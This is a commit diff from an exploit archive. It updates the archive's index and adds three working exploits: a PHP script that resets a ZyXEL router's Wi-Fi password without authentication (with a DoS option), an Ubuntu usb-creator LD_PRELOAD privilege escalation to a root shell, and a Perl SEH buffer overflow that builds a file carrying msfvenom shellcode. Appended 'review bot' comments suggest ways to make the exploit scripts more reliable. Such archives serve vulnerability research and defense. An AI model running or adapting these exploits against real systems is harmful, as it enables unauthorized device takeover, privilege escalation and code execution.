DB: 2015-04-24
3 new exploits
This commit is contained in:
parent
6ddbb48d4d
commit
93751b0d8e
4 changed files with 130 additions and 3 deletions
@ -26594,7 +26594,7 @@ id,file,description,date,author,platform,type,port
|
|||
29687,platforms/windows/remote/29687.py,"HyperBook Guestbook 1.3 GBConfiguration.DAT Hashed Password Information Disclosure Vulnerability",2007-02-28,PeTrO,windows,remote,0
|
||||
29544,platforms/php/webapps/29544.txt,"Juniper Junos J-Web - Privilege Escalation Vulnerability",2013-11-12,"Sense of Security",php,webapps,0
|
||||
29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (DoS)",2013-11-12,"Necmettin COSKUN",windows,dos,0
|
||||
36816,platforms/php/webapps/36816.php,"Open-Letters Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
|
||||
36816,platforms/php/webapps/36816.php,"Open-Letters - Remote PHP Code Injection Vulnerability",2015-04-22,"TUNISIAN CYBER",php,webapps,80
|
||||
29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
|
||||
29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - (SEH) Buffer Overflow",2013-11-12,metacom,windows,local,0
|
||||
29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - (.m3u) Local Buffer Overflow (SEH/Unicode)",2013-11-12,"Mike Czumak",windows,local,0
|
||||
|
@ -33218,5 +33218,8 @@ id,file,description,date,author,platform,type,port
|
|||
36813,platforms/hardware/local/36813.txt,"ADB Backup Archive Path Traversal File Overwrite",2015-04-21,"Imre Rad",hardware,local,0
|
||||
36814,platforms/osx/dos/36814.c,"Mac OS X Local Denial of Service",2015-04-21,"Maxime Villard",osx,dos,0
|
||||
36815,platforms/cfm/webapps/36815.txt,"BlueDragon CFChart Servlet 7.1.1.17759 - Arbitrary File Retrieval/Deletion",2015-04-21,Portcullis,cfm,webapps,80
|
||||
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
|
||||
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
|
||||
36818,platforms/php/webapps/36818.php,"Wolf CMS 0.8.2 - Arbitrary File Upload Exploit",2015-04-22,"CWH Underground",php,webapps,80
|
||||
36819,platforms/windows/local/36819.pl,"MooPlayer 1.3.0 - 'm3u' SEH Buffer Overflow",2015-04-22,"Tomislav Paskalev",windows,local,0
|
||||
36820,platforms/linux/local/36820.txt,"Ubuntu usb-creator 0.2.x - Local Privilege Escalation",2015-04-23,"Tavis Ormandy",linux,local,0
|
||||
36825,platforms/hardware/dos/36825.php,"ZYXEL P-660HN-T1H_IPv6 Remote Configuration Editor / Web Server DoS",2015-04-23,"Koorosh Ghorbani",hardware,dos,80
|
||||
36826,platforms/windows/local/36826.pl,"Free MP3 CD Ripper 2.6 2.8 (.wav) - SEH Based Buffer Overflow",2015-04-23,ThreatActor,windows,local,0
|
||||
|
|
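--- a/platforms/hardware/dos/36825.php
+++ b/platforms/hardware/dos/36825.php
@@ -0,0 +1,58 @@
+<?php
+/*
+Exploit Title : ZYXEL remote configuration editor / Web Server DoS
+Date : 23 April 2015
+Exploit Author : Koorosh Ghorbani
+Site : http://8thbit.net/
+Vendor Homepage : http://www.zyxel.com/
+Platform : Hardware
+Tested On : ZyXEL P-660HN-T1H_IPv6
+Firmware Version: 1.02(VLU.0)
+--------------------------
+Unattended remote access
+--------------------------
+ZYXEL Embedded Software does not check Cookies And Credentials on POST method so
+attackers could changes settings and view pages with post method .
+
+--------------------------
+DoS Web Server
+--------------------------
+sending empty Post to admin pages will crash internal web server and router needs
+to hard reset .
+
+*/
+$banner = " ___ _______ _ ____ _ _______ \r\n" . " / _ \__ __| | | _ \(_)__ __|\r\n" ." | (_) | | | | |__ | |_) |_ | | \r\n" ." > _ < | | | '_ \| _ <| | | | \r\n" ." | (_) | | | | | | | |_) | | | | \r\n" ." \___/ |_| |_| |_|____/|_| |_| \r\n" ." \r\n" ." \r\n";
+print $banner;
+function Post($packet,$host)
+{
+try {
+$curl = curl_init();
+curl_setopt($curl, CURLOPT_URL, $host);
+curl_setopt($curl, CURLOPT_POST, 1);
+curl_setopt($curl, CURLOPT_POSTFIELDS, $packet);
+curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
+curl_setopt($curl, CURLOPT_REFERER, "Referer: http://192.168.1.1/cgi-bin/WLAN_General.asp");
+curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
+$result = curl_exec($curl);
+curl_close($curl);
+return $result;
+}catch (Exception $e ){
+echo $e->getMessage();
+return "" ;
+}
+}
+if(sizeof($argv) < 3) {
+print "Usage : $argv[0] 192.168.1.1 NewWifiPassword\n";
+exit(1);
+}
+$host = $argv[1];
+$password = urlencode($argv[2]);
+$packet= "access=0&DoScan=0&ChannelDoScan=0&WlanQosFlag=0&HtExtcha=0&IsPtGui=0&SecurityIndexOriginal=3&EnableWLAN=on&SSID_INDEX=0&EnableWLanFlag=1&CountryRegion=1&CountryRegion0=0&CountryRegion1=1&CountryRegion2=2&CountryRegion3=3&CountryRegion5=5&CountryRegion6=6&Countries_Channels=IRAN&Channel_ID=11&HideSsidFlag=0&WPACompatileFlag=WPA2PSK&EncrypType=TKIPAES&PreSecurity_Sel=WPA2PSK&Security_Sel=WPA2PSK&WLANCfgPphrase=&WEP_Key1=&DefWEPKey=1&WLANCfgPSK=$password&WLANCfgAuthenTimeout=1800&WLANCfgIdleTimeout=3600&WLANCfgWPATimer=1800&WLANCfgRadiusServerAddr=0.0.0.0&WLANCfgRadiusServerPort=1812&WLANCfgRadiusServerKey=&Qos_Sel=None&doSubmitFlag=0" ;
+$target = "http://$host/cgi-bin/WLAN_General.asp";
+if(strlen(Post($packet,$target)) > 0){
+print "Seems Changed !";
+}else{
+print "Humm , No Chance !";
+}
+//DoS : Post("",$target) ;
+?>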
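Review bot: The try/catch wrapped around the curl calls in Post() never fires: the curl_* functions do not throw, curl_exec() signals a transport failure by returning false, and that false reaches strlen() at the call site as 0, so a refused connection or a hung host prints the same "Humm , No Chance !" as an empty 200 response. Test the return explicitly and surface the reason before the handle is closed, `if ($result === false) { echo curl_error($curl); }`, and bound the transfer with `curl_setopt($curl, CURLOPT_TIMEOUT, 10);` so a non-responding device does not block the script indefinitely. `sizeof($argv)` is an alias of count(); `count($argv)` is the conventional spelling.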
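--- a/platforms/linux/local/36820.txt
+++ b/platforms/linux/local/36820.txt
@@ -0,0 +1,23 @@
+Source: http://www.openwall.com/lists/oss-security/2015/04/22/12
+Bug report: https://bugs.launchpad.net/ubuntu/vivid/+source/usb-creator/+bug/1447396
+
+Ubuntu Precise (12.04LTS) <= usb-creator: 0.2.38.3ubuntu (Patched in: 0.2.38.3ubuntu0.1)
+Ubuntu Trusty (14.04LTS) <= usb-creator 0.2.56.3ubuntu (Patched in: 0.2.56.3ubuntu0.1)
+Ubuntu Utopic (14.10) <= usb-creator 0.2.62ubuntu0.2 (Patched in: 0.2.62ubuntu0.3)
+
+$ cat > test.c
+void __attribute__((constructor)) init (void)
+{
+chown("/tmp/test", 0, 0);
+chmod("/tmp/test", 04755);
+}
+^D
+$ gcc -shared -fPIC -o /tmp/test.so test.c
+$ cp /bin/sh /tmp/test
+$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator /com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
+method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
+$ ls -l /tmp/test
+-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
+$ /tmp/test
+# id
+euid=0(root) groups=0(root)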
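--- a/platforms/windows/local/36826.pl
+++ b/platforms/windows/local/36826.pl
@@ -0,0 +1,43 @@
+#!/usr/bin/env perl
+# original p0c https://www.exploit-db.com/exploits/36465/
+# credit to TUNISIAN CYBER
+# however he was attemping to vanilla buffer overflow
+# in fact it is SEH based exploit
+# using the address 0x7C9D30D7 is limit the targets
+#which I assume belongs to OS file didn't work on win7
+#yes he did find a buffer overflow since the offset reaches ESP before SEH
+#in this app, SEH based exploits are more effective and the main vuln in this case should be SEH
+#This p0c > win 7s & 8s
+# ThreatActor at CoreRed.com
+##
+
+my $file = "p0c.wav";
+my $buff = "A" x 4116; # offset to SEH
+my $nseh = "\xeb\x06\xff\xff"; #dat 8 jmp
+my $seh = pack('V', 0x66E42A79); # 66E42A79 5E POP ESI ogg.dll
+my $nop = "\x90" x 28;
+
+#msfvenom -p windows/exec CMD=calc.exe -f perl -b '\x00\xff\x0a\x0d'
+my $shell =
+"\xda\xcd\xd9\x74\x24\xf4\xb8\x50\x99\x22\x39\x5b\x33\xc9" .
+"\xb1\x31\x31\x43\x18\x83\xc3\x04\x03\x43\x44\x7b\xd7\xc5" .
+"\x8c\xf9\x18\x36\x4c\x9e\x91\xd3\x7d\x9e\xc6\x90\x2d\x2e" .
+"\x8c\xf5\xc1\xc5\xc0\xed\x52\xab\xcc\x02\xd3\x06\x2b\x2c" .
+"\xe4\x3b\x0f\x2f\x66\x46\x5c\x8f\x57\x89\x91\xce\x90\xf4" .
+"\x58\x82\x49\x72\xce\x33\xfe\xce\xd3\xb8\x4c\xde\x53\x5c" .
+"\x04\xe1\x72\xf3\x1f\xb8\x54\xf5\xcc\xb0\xdc\xed\x11\xfc" .
+"\x97\x86\xe1\x8a\x29\x4f\x38\x72\x85\xae\xf5\x81\xd7\xf7" .
+"\x31\x7a\xa2\x01\x42\x07\xb5\xd5\x39\xd3\x30\xce\x99\x90" .
+"\xe3\x2a\x18\x74\x75\xb8\x16\x31\xf1\xe6\x3a\xc4\xd6\x9c" .
+"\x46\x4d\xd9\x72\xcf\x15\xfe\x56\x94\xce\x9f\xcf\x70\xa0" .
+"\xa0\x10\xdb\x1d\x05\x5a\xf1\x4a\x34\x01\x9f\x8d\xca\x3f" .
+"\xed\x8e\xd4\x3f\x41\xe7\xe5\xb4\x0e\x70\xfa\x1e\x6b\x8e" .
+"\xb0\x03\xdd\x07\x1d\xd6\x5c\x4a\x9e\x0c\xa2\x73\x1d\xa5" .
+"\x5a\x80\x3d\xcc\x5f\xcc\xf9\x3c\x2d\x5d\x6c\x43\x82\x5e" .
+"\xa5\x20\x45\xcd\x25\x89\xe0\x75\xcf\xd5";
+
+open($FILE,">$file");
+print $FILE $buff.$nseh.$seh.$nop.$shell;
+close($FILE);
+print "+++++++++++++++++++\n";
+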
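Review bot: The output file is opened with the unchecked two-argument form `open($FILE,">$file")` on an undeclared global handle, and the script carries no `use strict; use warnings;`, so a failing open is silent and the trailing banner prints as if the write succeeded. Prefer the three-argument form with a lexical handle and checked I/O: `open my $fh, '>:raw', $file or die "open $file: $!";`, `print {$fh} $buff.$nseh.$seh.$nop.$shell;`, `close $fh or die "close $file: $!";` — `:raw` because the buffer is binary, not text. The comment header mixes `# ` and `#` prefixes; one style, with the space, reads more consistently.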